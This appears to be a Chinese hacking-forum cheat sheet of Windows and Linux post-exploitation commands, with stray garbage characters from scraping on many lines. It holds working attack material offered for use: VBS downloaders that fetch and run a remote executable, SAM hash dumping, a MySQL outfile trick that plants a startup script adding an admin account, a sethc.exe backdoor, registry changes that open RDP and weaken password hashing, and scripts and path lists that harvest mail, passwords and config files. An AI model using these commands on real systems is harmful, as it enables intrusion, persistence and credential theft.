6 {- m6 p3 |, M# [( I4 R
（注：本文原件由0x童鞋收集整理，感谢0x童鞋，本人补充和优化了点，本文毫无逻辑可言，因为是想到什么就写了，大家见谅）
3 N- S5 b* [7 J7 D1 C——————————————
感谢T00LS的童鞋们踊跃交流，让我学到许多经验，为了方便其他童鞋浏览，将T00LS的童鞋们补充的贴在下面，同时我也会以后将自己的一些想法跟新在后面。
————————————————————————————
1、tar打包            tar -cvf /home/public_html/*.tar /home/public_html/--exclude= 排除文件*.gif   排除目录 /xx/xx/*
alzip打包(韩国) alzip -a D:\WEB\ d:\web\*.rar
5 H3 V5 W/ m3 X) y- S% M{
& E) \* X" }( @8 c' b1 r注：
关于tar的打包方式,linux不以扩展名来决定文件类型。
  b+ ?' K# l5 P9 o7 ?; ^2 a若压缩的话tar -ztf *.tar.gz   查看压缩包里内容     tar -zxf *.tar.gz 解压
那么用这条比较好 tar -czf /home/public_html/*.tar.gz /home/public_html/--exclude= 排除文件*.gif   排除目录 /xx/xx/*
}  
) P. \2 i' U7 i0 u; F  @
提权先执行systeminfo
- L7 T- S) ], t1 Mtoken 漏洞补丁号 KB956572
) b/ o6 P% n# h1 M( ^Churrasco          kb952004
命令行RAR打包~~·
rar a -k -r -s -m3 c:\1.rar c:\folder
——————————————
2、收集系统信息的脚本  
for window：

8 _+ f$ J8 f) g; u/ B@echo off
echo #########system info collection
systeminfo
' y$ B6 e+ Q* d0 lver
hostname
net user
; r0 h0 X0 L% g4 L7 W3 y5 Onet localgroup
net localgroup administrators
net user guest
net user administrator
' j- d' L8 _9 z- \. W3 W4 c: B
echo #######at- with   atq#####
echo schtask /query
8 W  |' d" V. S2 q& f
echo
( q% S4 g6 ]% G5 X, N( i! yecho ####task-list#############
( H! L# w6 _" x% q3 Vtasklist /svc
1 }* n6 f: H' Zecho
echo ####net-work infomation
ipconfig/all
% d; E% D1 j, `% nroute print
arp -a
netstat -anipconfig /displaydns
echo
! G9 \- `  t( techo #######service############
. _% K8 j0 r' E  t& b* esc query type= service state= all
- N" J0 e, i! l1 o. E3 ^  Zecho #######file-##############
cd \
tree -F
& T7 B8 z) H" n/ O0 _5 Kfor linux：
4 d, f0 e( ~9 H: P
#!/bin/bash

echo #######geting sysinfo####
echo ######usage: ./getinfo.sh >/tmp/sysinfo.txt
echo #######basic infomation##
cat /proc/meminfo
echo
# E$ s  N9 D3 J1 h% B- @9 k* T9 }2 Fcat /proc/cpuinfo
( @* a% M# t& Iecho
rpm -qa 2>/dev/null
. c1 o9 }+ r( b$ ^" X######stole the mail......######
  e. Q# ~! |" j% s" \( ycp -a /var/mail /tmp/getmail 2>/dev/null
1 {5 x* H& z% p" H7 r

echo 'u'r id is' `id`
1 S; t. q1 h, Q; e& W1 e& Jecho ###atq&crontab#####
atq
1 s  O3 B) Z* `. _3 f3 E  Hcrontab -l
, ?, p+ y9 q& _& a/ J8 y  jecho #####about var#####
  X7 F8 Q5 q/ ?) U2 s+ Lset

# z/ L. }+ z% @! \) j1 ?# S; {echo #####about network###
# p+ }- ]' t; j2 F/ ]% a####this is then point in pentest,but i am a new bird,so u need to add some in it
cat /etc/hosts
hostname
ipconfig -a
2 M" Z/ @6 ^1 b; v# i2 K8 I! y' zarp -v
2 |: \& ]4 q- ]* b' r6 ?echo ########user####
/ a: X& p" H0 Y! p& d: A/ X. W6 B4 xcat /etc/passwd|grep -i sh

echo ######service####
. r4 h- E4 m% `% n1 S" }chkconfig --list

9 C2 B; Z' j0 {* R8 R3 Tfor i in {oracle,mysql,tomcat,samba,apache,ftp}
cat /etc/passwd|grep -i $i
done
) z0 S  N2 V0 Y8 o# N. f- Z4 ^
( x2 x# ^( m) A1 ~. P' Q  {0 x6 slocate passwd >/tmp/password 2>/dev/null
) D+ ?# C3 O& S, q$ L+ T) d4 ?sleep 5
# D0 w: \1 n9 r& Q+ ?% slocate password >>/tmp/password 2>/dev/null
, \( W: F# P. k( x6 `sleep 5
locate conf >/tmp/sysconfig 2>dev/null
" l  |* |+ \; ?% v* n1 Ysleep 5
2 i) M+ v9 L9 l+ n. r, slocate config >>/tmp/sysconfig 2>/dev/null
+ p- x7 c+ N2 e" y6 Usleep 5

###maybe can use "tree /"###
echo ##packing up#########
tar cvf getsysinfo.tar /tmp/getmail /tmp/password /tmp/sysconfig
rm -rf /tmp/getmail /tmp/password /tmp/sysconfig
——————————————
( Y$ [" c/ q- N7 `8 G, ?& c1 c3、ethash 不免杀怎么获取本机hash。
首先导出注册表 regedit /e d:\aa.reg "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users"   （2000）
               reg export "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users" d:\aa.reg  （2003）
  o) @+ H/ B( n8 e5 X注意权限问题，一般注册表默认sam目录是不能访问的。需要设置为完全控制以后才可以访问（界面登录的需要注意，system权限可以忽略）
接下来就简单了，把导出的注册表，down 到本机，修改注册表头导入本机，然后用抓去hash的工具抓本地用户就OK了
# r6 a% C, u% s) @hash 抓完了记得把自己的账户密码改过来哦！
6 G0 A9 L$ I! I2 c  t8 ~据我所知，某人是用这个方法虚拟机多次因为不知道密码而进不去！~
——————————————
+ E0 G/ Z/ w, \& e4、vbs 下载者
# o9 k6 H+ e0 L4 w$ r7 g# D: `  L1
echo Set sGet = createObject("ADODB.Stream") >>c:\windows\cftmon.vbs
echo sGet.Mode = 3 >>c:\windows\cftmon.vbs
echo sGet.Type = 1 >>c:\windows\cftmon.vbs
( d% f3 p6 x9 s0 P4 h2 |! _1 \echo sGet.Open() >>c:\windows\cftmon.vbs
echo sGet.Write(xPost.responseBody) >>c:\windows\cftmon.vbs
$ b! F. i8 V+ U' G8 N1 ^echo sGet.SaveToFile "c:\windows\e.exe",2 >>c:\windows\cftmon.vbs
7 Z% L' H% S; A7 `8 D8 Lecho Set objShell = CreateObject("Wscript.Shell") >>c:\windows\cftmon.vbs
8 |7 T' j: G  \& eecho objshell.run """c:\windows\e.exe""" >>c:\windows\cftmon.vbs
cftmon.vbs

, h4 j0 y8 X9 F5 P2
On Error Resume Nextim iRemote,iLocal,s1,s2
iLocal = LCase(WScript.Arguments(1)):iRemote = LCase(WScript.Arguments(0))  
: @  V8 S" b; p, j# ms1="Mi"+"cro"+"soft"+"."+"XML"+"HTTP":s2="ADO"+"DB"+"."+"Stream"
" _8 R; Q" l8 B6 a- ~4 N- XSet xPost = CreateObject(s1):xPost.Open "GET",iRemote,0:xPost.Send()
% _0 J' M' F* ]9 m: ~Set sGet = CreateObject(s2):sGet.Mode=3:sGet.Type=1:sGet.Open()
5 |" Q/ g4 W5 G, nsGet.Write(xPost.responseBody):sGet.SaveToFile iLocal,2
$ k& y* p' r2 L2 Z4 E
* R: }! e7 C* J' ~$ Jcscript c:\down.vbs http://xxxx/mm.exe c:\mm.exe
5 O' [$ A% l4 E: _% t; `
* D  o9 g  ?  P% w2 m% S# n: U当GetHashes获取不到hash时，可以用兵刃把sam复制到桌面
& {7 s0 i; X# @5 t——————————————————
" C0 h6 ~6 y$ n5、
1.查询终端端口
! T( {9 f7 r- z# b( X0 l$ ZREG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
7 N3 y8 K) o1 W2 r0 d2.开启XP&2003终端服务
7 M  M# M6 [3 L: J! }REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
3.更改终端端口为2008(0x7d8)
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x7d8 /f
0 H, F# g2 P0 {. `REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x7D8 /f
9 `: }$ G! M1 y! J; x) y4 Z5 r4.取消xp&2003系统防火墙对终端服务的限制及IP连接的限制
7 \* M/ X- J# H) L8 E* G8 n4 j; MREG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled   xpsp2res.dll,-22009 /f
& U/ X6 l; Z8 x' ^( t: t+ e" m5 z————————————————
6、create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"")");
" c" l" a7 O. Z+ Q4 dinsert into a values ("a=wshshell.run (""cmd.exe /c net user admin admin /add"",0)");
0 w" F4 `# b. k% s. `7 Rinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators admin /add"",0)");  
- s  T3 t9 s  A3 i, S% ~. O3 V# Hselect * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
* c+ l3 Q6 g5 v+ i$ T5 s————————————————————
7、BS马的PortMap功能，类似LCX做转发。若果支持ASPX，用这个转发会隐蔽点。（注：一直忽略了在偏僻角落的那个功能）
_____
8、for /d %i in (d:\freehost\*) do @echo %i
1 Z( F$ Q5 U5 ^- \
+ @4 h2 m4 n( b: O列出d的所有目录
  
2 b7 t; ]* e/ [4 V) `  for /d %i in (???) do @echo %i

2 e' u  ~' [* ?& i* h6 ]7 N8 v; c6 E把当前路径下文件夹的名字只有1-3个字母的打出来

3 W2 n* s+ g8 g# D* S0 r4 {2.for /r %i in (*.exe) do @echo %i
1 J# e+ `! a# K0 u# Z2 E. e: R  
5 [. T, e% j% L6 m2 y以当前目录为搜索路径.会把目录与下面的子目录的全部EXE文件列出

# y. u' E2 D: Z" B- F8 ]+ [- ]for /r f:\freehost\hmadesign\web\ %i in (*.*) do @echo %i

9 v. m; P- s8 {3.for /f %i in (c:\1.txt) do echo %i
  
  //这个会显示a.txt里面的内容，因为/f的作用，会读出a.txt中

% W4 ?! o  i! [7 T4.for /f "tokens=2 delims= " %i in (a.txt) do echo %i
5 J+ }% y* F6 @5 ]3 q
  delims=后的空格是分隔符 tokens是取第几个位置
5 y% [3 F9 T7 H  w——————————
●注册表:
1.Administrator注册表备份:
% \& ^( f* {# [7 b- \reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\1f4.reg
+ a" B$ O' D' \
2.修改3389的默认端口:
HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp
) y% }# ?$ U2 M. [! V2 g修改PortNumber.
) z6 o# e: Q/ s
3.清除3389登录记录:
reg delete "HKCU\Software\Microsoft\Terminal Server Client"  /f

9 L( q7 g7 }7 H, _4.Radmin密码:
reg export HKLM\SYSTEM\RAdmin c:\a.reg
: M* u# _( m; J
( o) g; o! ^( {% T5 h5.禁用TCP/IP端口筛选(需重启):
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f

6.IPSec默认免除项88端口(需重启):
reg add HKLM\SYSTEM\CurrentControlSet\Services\IPSEC /v NoDefaultExempt /t REG_DWORD /d 0 /f
( W3 {# P) X" r% L" y或者
netsh ipsec dynamic set config ipsecexempt value=0

7.停止指派策略"myipsec":
7 ]  r$ a* z( X% H% Vnetsh ipsec static set policy name="myipsec" assign=n

& x# q7 [2 _8 v3 S0 s3 ^& D8.系统口令恢复LM加密:
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v LMCompatibilityLevel /t REG_DWORD /d 0 /f

! x: h( G/ R4 q9.另类方法抓系统密码HASH
, u6 L  h  h) S  [4 C4 nreg save hklm\sam c:\sam.hive
reg save hklm\system c:\system.hive
reg save hklm\security c:\security.hive

10.shift映像劫持
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v debugger /t REG_sz /d cmd.exe

reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /f
- Q- n9 _; i/ |) E5 P# o7 X-----------------------------------
星外vbs(注：测试通过，好东西）
Set ObjService=GetObject("IIS://LocalHost/W3SVC")
For Each obj3w In objservice
/ N1 N1 c: Z/ c; d7 _. QchildObjectName=replace(obj3w.AdsPath,Left(obj3w.Adspath,22),"")
3 |+ C( s# g8 H2 g- U& w) e% Iif IsNumeric(childObjectName)=true then
9 Q( K1 s7 W+ j& i9 y1 d) \set IIs=objservice.GetObject("IIsWebServer",childObjectName)
if err.number<>0 then
$ F$ S+ ~1 L2 }exit for
msgbox("error!")
wscript.quit
end if
& E1 ?. s7 [, P% Cserverbindings=IIS.serverBindings
ServerComment=iis.servercomment
set IISweb=iis.getobject("IIsWebVirtualDir","Root")
0 ^6 E7 {1 s7 u* y' \user=iisweb.AnonymousUserName
( y$ D& u4 E9 Q6 A/ ppass=iisweb.AnonymousUserPass
' Q! `3 C5 o9 I+ C+ F+ D5 Vpath=IIsWeb.path
2 \9 b1 L3 F: X( klist=list&servercomment&" "&user&" "&pass&" "&join(serverBindings,",")&" "&path& vbCrLf & vbCrLf
- c9 g8 s& p' f; Q( A- Bend if
$ n7 [5 l- L% [( bNext
4 `8 M1 E' d; L! n2 o6 Y8 swscript.echo list
% _0 j7 M& M* g+ J, M" DSet ObjService=Nothing
wscript.echo "from : http://www.xxx.com/" &vbTab&vbCrLf
/ I1 F! H% h' a: QWScript.Quit
4 p8 [" p" e2 @  ^8 g% o复制代码
+ r% G( O% N. V7 I, U: J0 N% f----------------------2011新气象，欢迎各位补充、指正、优化。----------------
0 F6 A0 ?* e4 T* O  R1、Firefox的利用(主要用于内网渗透），火狐浏览器的密码储存在C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\文件夹，打包后，本地查看。或有很多惊喜~
  B+ ^% u. T! e4 S  B5 N2 J4 U% h5 j: S$ ~2、win2k的htt提权（注：仅适合2k以及以下版本，文件夹不限,只读权限即可)
将folder.htt文件，加入以下代码：
/ k* ^& c- U# z5 E$ N; d+ M<OBJECT ID=RUNIT WIDTH=0 HEIGHT=0 TYPE="application/x-oleobject" CODEBASE="cmd.exe">
</OBJECT>
6 ]0 M' b# }* J, u1 ^( L" H复制代码
然后与desktop.ini、cmd.exe同一个文件夹。当管理打开该文件夹时即可运行。
# j, o- N$ g& \- M( U2 u  xPS：我N年前在邪八讨论过XP下htt提权，由于N年前happy蠕虫的缘故，2K以后都没有folder.htt文件，但是xp下的htt自运行各位大牛给个力~
2 B: _  Z2 U/ W) }asp代码，利用的时候会出现登录问题
原因是ASP大马里有这样的代码：（没有就没事儿了）
/ f5 C; d# |7 X& K! h' \ url=request.severvariables("url")
  j) U0 Q6 V/ D1 P# ] 这里显示接收到的参数是通过URL来传递的，也就是说登录大马的时候服务器会解析b.asp，于是就出现了问题。
解决方法
url=request.severvariables("path_info")
% K/ F$ ~% h" h3 t5 ^% W path_info可以直接呈现虚拟路径 顺利解析gif大马
# A/ H. C6 |; \; P! F
5 q, ?- b  r' }. X) H- ]==============================================================
' m: E( ]  D8 O4 E7 B8 x6 `% MLINUX常见路径：
+ d+ |+ `4 @; [4 Z8 A
* ]$ L: }' E/ @, z/ {! ]3 T/etc/passwd
/etc/shadow
9 p% A% V) r- j6 W+ E, w$ Y/etc/fstab
- D1 H" s1 x. ^/etc/host.conf
8 K! c1 p3 r+ ^( X  d/etc/motd
/etc/ld.so.conf
6 T, n+ d8 O+ W4 L  U3 \/var/www/htdocs/index.php
; C( N/ c- v8 _  t% G/var/www/conf/httpd.conf
/var/www/htdocs/index.html
/var/httpd/conf/php.ini
: p" G1 W( ?1 ]. \/var/httpd/htdocs/index.php
/var/httpd/conf/httpd.conf
/var/httpd/htdocs/index.html
/var/httpd/conf/php.ini
/var/www/index.html
5 I# d% n8 w, D: H* B) I/var/www/index.php
! a8 D0 L2 V: L% L; `: F/opt/www/conf/httpd.conf
1 L2 E3 n8 ~, s& T/opt/www/htdocs/index.php
* O' R/ `( I4 Z* f/opt/www/htdocs/index.html
9 [, P  L' S" e% k' Q! T& I6 X/usr/local/apache/htdocs/index.html
/usr/local/apache/htdocs/index.php
( }$ T& ]4 o5 C" q. l1 X7 B- q: M/usr/local/apache2/htdocs/index.html
/usr/local/apache2/htdocs/index.php
5 L% q3 c8 X& E: Y. p4 h3 b/usr/local/httpd2.2/htdocs/index.php
' \: S7 H8 R8 r0 n# r) }/usr/local/httpd2.2/htdocs/index.html
/tmp/apache/htdocs/index.html
/tmp/apache/htdocs/index.php
/etc/httpd/htdocs/index.php
8 B0 z: v2 K! g. H# M4 m/etc/httpd/conf/httpd.conf
$ b. y! @5 C5 L: ^3 B" a6 t/etc/httpd/htdocs/index.html
4 _! ^2 ^7 r. @' x  b% g/www/php/php.ini
6 o" y/ Z/ n* D/ M. i; L2 c/www/php4/php.ini
/www/php5/php.ini
4 y( F9 C$ s( J% _6 X/www/conf/httpd.conf
/www/htdocs/index.php
/www/htdocs/index.html
# n7 E( i% @) `7 U' n) `/usr/local/httpd/conf/httpd.conf
/apache/apache/conf/httpd.conf
2 |! h8 ]5 B4 G& a7 ?/ t/apache/apache2/conf/httpd.conf
/etc/apache/apache.conf
! J  W& R( x1 z4 U5 {, k4 f' c3 {/etc/apache2/apache.conf
/etc/apache/httpd.conf
3 s9 y+ q  ?" i/etc/apache2/httpd.conf
$ L9 G9 Z( J7 z! Q5 r/etc/apache2/vhosts.d/00_default_vhost.conf
! h, \) [3 G& ]0 h8 k& F/etc/apache2/sites-available/default
) x8 [& U: R( m: Y/etc/phpmyadmin/config.inc.php
/etc/mysql/my.cnf
, V4 t0 B2 @. j7 M/etc/httpd/conf.d/php.conf
# x: _6 u1 a, s0 m) f8 i/ V/etc/httpd/conf.d/httpd.conf
/etc/httpd/logs/error_log
& L( g& C% A5 N# e9 w( X/etc/httpd/logs/error.log
/etc/httpd/logs/access_log
! r* A) ?2 N; F1 e/etc/httpd/logs/access.log
/home/apache/conf/httpd.conf
/home/apache2/conf/httpd.conf
: Q# H. k- X2 [2 j! {4 ]4 x/var/log/apache/error_log
/var/log/apache/error.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/apache2/error_log
/var/log/apache2/error.log
/var/log/apache2/access_log
0 o/ c: z8 s8 o) K) q4 Z/var/log/apache2/access.log
) E6 ~0 x% q* J4 a- Z+ P) E* k1 t/var/www/logs/error_log
/var/www/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/error_log
$ R. j+ J5 ~) {; f8 \7 g/var/log/error.log
/var/log/access_log
" L3 L. m& I; ^& P/var/log/access.log
/usr/local/apache/logs/access_logaccess_log.old
/usr/local/apache/logs/error_logerror_log.old
5 L' r4 O9 A- K; h( L/etc/php.ini
/bin/php.ini
- g  t7 ~& I! S8 h& X0 E( ^' P/etc/init.d/httpd
5 D, ^8 P) y* B/etc/init.d/mysql
, K! l. D/ O' e" ]9 W5 k, e/etc/httpd/php.ini
/usr/lib/php.ini
. e7 ~0 _6 z  ]5 c' R) D" ]/usr/lib/php/php.ini
/usr/local/etc/php.ini
' Z7 y/ @1 {6 w! B* E/usr/local/lib/php.ini
* S' Z1 G# I& h* U9 W5 ?/usr/local/php/lib/php.ini
1 [7 E3 T3 H9 z/usr/local/php4/lib/php.ini
) P6 Y2 w) n- U8 A/usr/local/php4/php.ini
/usr/local/php4/lib/php.ini
! w2 W7 T' D2 G& M/usr/local/php5/lib/php.ini
! S1 k9 r1 ]1 T' _* @3 u" F. m/usr/local/php5/etc/php.ini
2 t! e2 d" D0 W, _, @/usr/local/php5/php5.ini
/usr/local/apache/conf/php.ini
/usr/local/apache/conf/httpd.conf
) w7 i& ?# S$ k& E3 P: n  H# Y' h/usr/local/apache2/conf/httpd.conf
* F: G" A' H1 G  x  [" R* u9 k/usr/local/apache2/conf/php.ini
* p4 k6 b2 d+ o7 F& E/etc/php4.4/fcgi/php.ini
. A6 l% e! ], k7 B% G" h6 v' Q/etc/php4/apache/php.ini
& [: M/ K. a# l; a/etc/php4/apache2/php.ini
/etc/php5/apache/php.ini
/etc/php5/apache2/php.ini
/etc/php/php.ini
. S% W; m8 r" q# N0 g/etc/php/php4/php.ini
/etc/php/apache/php.ini
/etc/php/apache2/php.ini
% [% ]& k) J$ d# n' B/web/conf/php.ini
/usr/local/Zend/etc/php.ini
/opt/xampp/etc/php.ini
/var/local/www/conf/php.ini
) _' @  ?+ g, [/var/local/www/conf/httpd.conf
/ @" Z  B+ B$ j' U3 _. C( v/etc/php/cgi/php.ini
8 [) i4 y7 f( b* Y/etc/php4/cgi/php.ini
: m  b1 e# o. ]* v# M$ V. t/etc/php5/cgi/php.ini
/php5/php.ini
/php4/php.ini
/php/php.ini
9 R8 ?! X* o- A; D3 r+ O/PHP/php.ini
: x# w9 |4 d1 y9 ]; }3 s" e" e/apache/php/php.ini
/xampp/apache/bin/php.ini
" M4 X( P$ g$ u! P/xampp/apache/conf/httpd.conf
/NetServer/bin/stable/apache/php.ini
& }7 p0 o. G2 P. h5 E& `/home2/bin/stable/apache/php.ini
4 g8 X4 h6 K# u/home/bin/stable/apache/php.ini
/var/log/mysql/mysql-bin.log
1 [% s5 u1 R! [# Q1 m/var/log/mysql.log
# I: Z9 P& G& ~5 o% W- K, F. V" K/var/log/mysqlderror.log
) c# p/ `! ?" @1 S1 ~/var/log/mysql/mysql.log
/var/log/mysql/mysql-slow.log
/var/mysql.log
- A0 n4 g& L- E( }! K) X" Q3 t/var/lib/mysql/my.cnf
/usr/local/mysql/my.cnf
1 P: ~+ L) |* l$ E; P7 Q4 [, ]# e! S/usr/local/mysql/bin/mysql
6 s% N3 g4 s: r. Y# ^# F8 v/etc/mysql/my.cnf
& j' x9 V0 Y1 u/etc/my.cnf
7 j0 C! ]9 d3 b1 c. J/usr/local/cpanel/logs
+ Y$ v& T0 t" b1 `( [3 A/usr/local/cpanel/logs/stats_log
/usr/local/cpanel/logs/access_log
0 k) t$ R! V; y$ \$ _1 n/usr/local/cpanel/logs/error_log
/usr/local/cpanel/logs/license_log
/usr/local/cpanel/logs/login_log
/usr/local/cpanel/logs/stats_log
3 s0 P8 w  c7 U2 r/usr/local/share/examples/php4/php.ini
! E& s+ v, M& k! `/usr/local/share/examples/php/php.ini
! X" J) a+ w9 z
2..windows常见路径（可以将c盘换成d,e盘,比如星外虚拟主机跟华众得,一般都放在d盘）
5 P2 {+ t" f8 [4 F" @( p/ V
c:\windows\php.ini
c:\boot.ini
c:\1.txt
c:\a.txt
) i. G9 g" O7 v1 V
: C& P) }4 t0 h) wc:\CMailServer\config.ini
/ v1 C  c1 z* {) Q" wc:\CMailServer\CMailServer.exe
c:\CMailServer\WebMail\index.asp
1 G; `' ?) l, a( W& r% w; Hc:\program files\CMailServer\CMailServer.exe
c:\program files\CMailServer\WebMail\index.asp
C:\WinWebMail\SysInfo.ini
C:\WinWebMail\Web\default.asp
C:\WINDOWS\FreeHost32.dll
C:\WINDOWS\7i24iislog4.exe
+ P8 Y. c: L0 \2 d  K- p6 \C:\WINDOWS\7i24tool.exe
- k- D/ l( H& @- k: U) W4 _
( K. w+ O" Y3 ], fc:\hzhost\databases\url.asp
7 [" ?8 P4 M9 Z+ |
3 s1 r8 m, q$ h+ cc:\hzhost\hzclient.exe
C:\Documents and Settings\All Users\「开始」菜单\程序\7i24虚拟主机管理平台\自动设置[受控端].lnk
: h+ t- e+ e( G( Z: t2 X% Z9 b) X% l
C:\Documents and Settings\All Users\「开始」菜单\程序\Serv-U\Serv-U Administrator.lnk
C:\WINDOWS\web.config
9 a/ @# ]" S1 j+ G& {3 k0 I: Rc:\web\index.html
c:\www\index.html
- V3 Z1 o) k. _9 J+ U, kc:\WWWROOT\index.html
c:\website\index.html
c:\web\index.asp
/ V- N: q* B4 V7 Q+ s6 hc:\www\index.asp
c:\wwwsite\index.asp
c:\WWWROOT\index.asp
) u* Z; X! K, \5 s+ H: \7 dc:\web\index.php
c:\www\index.php
! U7 l0 H1 b$ D" i3 w7 t5 sc:\WWWROOT\index.php
; o+ E( y3 W0 J, X& [6 o, wc:\WWWsite\index.php
c:\web\default.html
c:\www\default.html
c:\WWWROOT\default.html
% b, M8 M1 u+ m! Pc:\website\default.html
c:\web\default.asp
9 X- U! e; k9 a' s) q% F  _6 ]c:\www\default.asp
  \6 M# P  c- C5 oc:\wwwsite\default.asp
' m$ W: r: Z9 M. Cc:\WWWROOT\default.asp
c:\web\default.php
c:\www\default.php
* J5 Z3 K7 d' A$ Lc:\WWWROOT\default.php
: Z6 S1 t/ z) `c:\WWWsite\default.php
C:\Inetpub\wwwroot\pagerror.gif
c:\windows\notepad.exe
c:\winnt\notepad.exe
$ E% U8 N* A1 b  UC:\Program Files\Microsoft Office\OFFICE10\winword.exe
C:\Program Files\Microsoft Office\OFFICE11\winword.exe
' v3 U  S4 p" }. q% l9 ^C:\Program Files\Microsoft Office\OFFICE12\winword.exe
4 }1 u  `1 z: g* F4 \C:\Program Files\Internet Explorer\IEXPLORE.EXE
C:\Program Files\winrar\rar.exe
C:\Program Files\360\360Safe\360safe.exe
: E" [3 Y+ D' [: A3 g1 sC:\Program Files\360Safe\360safe.exe
% E& O: }& H2 ]* B% c6 `+ W3 bC:\Documents and Settings\Administrator\Application Data\360Safe\360Examine\360Examine.log
c:\ravbin\store.ini
  L1 K8 N2 i  K" [0 _4 ec:\rising.ini
! T9 Y. m+ k5 g9 N  [C:\Program Files\Rising\Rav\RsTask.xml
! M( n" w4 s8 M7 }8 V9 f. ]C:\Documents and Settings\All Users\Start Menu\desktop.ini
C:\Documents and Settings\Administrator\My Documents\Default.rdp
C:\Documents and Settings\Administrator\Cookies\index.dat
* H! c6 C8 x, N# o3 [C:\Documents and Settings\Administrator\My Documents\新建 文本文档.txt
/ ~4 f: d8 V+ C, ^( b+ l" d% q" RC:\Documents and Settings\Administrator\桌面\新建 文本文档.txt
' `+ m: N) a, QC:\Documents and Settings\Administrator\My Documents\1.txt
C:\Documents and Settings\Administrator\桌面\1.txt
  d, |7 r0 a' A9 [$ ~3 pC:\Documents and Settings\Administrator\My Documents\a.txt
, M6 H: X2 X6 \/ ^" r! |C:\Documents and Settings\Administrator\桌面\a.txt
C:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Blue hills.jpg
' Q7 R" K6 z. I3 |! J8 j: U% OE:\Inetpub\wwwroot\aspnet_client\system_web\1_1_4322\SmartNav.htm
. @0 r' Z7 a' q6 q" m1 ?% hC:\Program Files\RhinoSoft.com\Serv-U\Version.txt
- [+ h0 o3 M' @# Q- z& {C:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini
C:\Program Files\Symantec\SYMEVENT.INF
C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe
C:\Program Files\Microsoft SQL Server\MSSQL\Data\master.mdf
9 I  O+ M# U# a4 `+ Y& NC:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Data\master.mdf
& I) N( O! ]) y0 NC:\Program Files\Microsoft SQL Server\MSSQL.2\MSSQL\Data\master.mdf
( v+ \  y5 O7 uC:\Program Files\Microsoft SQL Server\80\Tools\HTML\database.htm
6 ~/ k; _9 n: v0 u8 O+ Y4 ^' bC:\Program Files\Microsoft SQL Server\MSSQL\README.TXT
C:\Program Files\Microsoft SQL Server\90\Tools\Bin\DdsShapes.dll
4 @9 u. L$ h4 d# Z1 PC:\Program Files\Microsoft SQL Server\MSSQL\sqlsunin.ini
- M. I$ }, c9 L$ ^8 o! i+ KC:\MySQL\MySQL Server 5.0\my.ini
8 K+ b. \# q! q9 c, ]- F9 }C:\Program Files\MySQL\MySQL Server 5.0\my.ini
- z9 V) [0 v! w. K$ A% s0 J2 U0 wC:\Program Files\MySQL\MySQL Server 5.0\data\mysql\user.frm
, O( w7 x( I+ g, s# d2 p: S8 p+ DC:\Program Files\MySQL\MySQL Server 5.0\COPYING
4 j( `! v2 U; _C:\Program Files\MySQL\MySQL Server 5.0\share\mysql_fix_privilege_tables.sql
7 ]5 Q0 {/ u6 ^C:\Program Files\MySQL\MySQL Server 4.1\bin\mysql.exe
9 g! z) }9 k4 Q7 u, w" rc:\MySQL\MySQL Server 4.1\bin\mysql.exe
c:\MySQL\MySQL Server 4.1\data\mysql\user.frm
1 C" g5 \8 k3 y* e( {' z1 i, U! B2 oC:\Program Files\Oracle\oraconfig\Lpk.dll
C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe
C:\WINDOWS\system32\inetsrv\w3wp.exe
8 o; y( N# J4 X6 g/ J8 RC:\WINDOWS\system32\inetsrv\inetinfo.exe
- V5 l8 o( n" |; M! }' e! w7 |C:\WINDOWS\system32\inetsrv\MetaBase.xml
C:\WINDOWS\system32\inetsrv\iisadmpwd\achg.asp
# }2 ]2 K. s' d& @C:\WINDOWS\system32\config\default.LOG
# d7 F* @9 I) p$ Z) oC:\WINDOWS\system32\config\sam
" n" f6 D! ?$ J7 eC:\WINDOWS\system32\config\system
' ?; k- s. y9 _& vc:\CMailServer\config.ini
c:\program files\CMailServer\config.ini
/ h8 ~' P# u0 g. Xc:\tomcat6\tomcat6\bin\version.sh
c:\tomcat6\bin\version.sh
' L2 ?9 D1 z+ }- M5 Wc:\tomcat\bin\version.sh
6 r/ X: d: ]8 k9 V& w. \1 X/ L! ]c:\program files\tomcat6\bin\version.sh
C:\Program Files\Apache Software Foundation\Tomcat 6.0\bin\version.sh
c:\Program Files\Apache Software Foundation\Tomcat 6.0\logs\isapi_redirect.log
& b/ O# Z, t# N9 f0 C+ u& e1 Sc:\Apache2\Apache2\bin\Apache.exe
c:\Apache2\bin\Apache.exe
c:\Apache2\php\license.txt
